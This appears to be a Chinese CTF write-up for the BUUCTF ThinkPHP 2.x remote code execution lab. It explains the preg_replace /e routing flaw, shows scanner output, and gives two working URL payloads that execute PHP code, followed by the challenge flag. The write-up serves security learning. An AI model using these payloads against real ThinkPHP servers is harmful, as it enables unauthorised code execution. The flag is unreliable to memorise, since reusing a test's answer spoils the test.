BUUCTF-Real-[ThinkPHP]2-Rce1

任意代码执行漏洞

ThinkPHP 2.x版本中,使用preg_replace/e模式匹配路由:

$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。

ThinkPHP 3.0版本因为Lite模式下没有修复该漏洞,也存在这个漏洞。


POC检测


[15:05:31] [INFO] 检测到: thinkphp_lite_code_exec from script thinkphp_lite_code_exec.py, 目标: http://node5.buuoj.cn:27744/
[15:05:31] [INFO] 正在检测 [29%/1][http://node5.buuoj.cn:27744]  poc: thinkphp_pay_orderid_sqli
[15:05:31] [INFO] 正在检测 [30%/1][http://node5.buuoj.cn:27744]  poc: thinkphp_method_filter_code_exec
[15:05:31] [INFO] 检测到: Thinkphp 2.x rce from script thinkphp2_rce.py, 目标: http://node5.buuoj.cn:27744/

经过poc检测,该版本的thinphp 2.x存在rce漏洞!

漏洞利用

----
[!] Name: thinkphp_lite_code_exec
    Script: thinkphp_lite_code_exec.py
    Url: http://node5.buuoj.cn:27744/
      Vulnerable: True
      Method: GET
      Payload: http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D
[!] Name: Thinkphp 2.x rce
    Script: thinkphp2_rce.py
    Url: http://node5.buuoj.cn:27744/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}
----


http://node5.buuoj.cn:27744/index.php/module/action/param1/$%7B@print%28md5%282333%29%29%7D
http://node5.buuoj.cn:27744/index.php?s=a/b/c/${var_dump(md5(1))}

BUUCTF-Real-[ThinkPHP]2-Rce1_第1张图片

经过验证两个payload都可以使用!我们查看phpinfo页面!


get flag

 BUUCTF-Real-[ThinkPHP]2-Rce1_第2张图片

BUUCTF-Real-[ThinkPHP]2-Rce1_第3张图片 

自由组合payload,都可以触发代码执行漏洞! 

flag{f2613e0d-5ccc-42d9-b18b-509dc185df9c}

你可能感兴趣的:(漏洞复现与研究,安全,web安全,网络安全)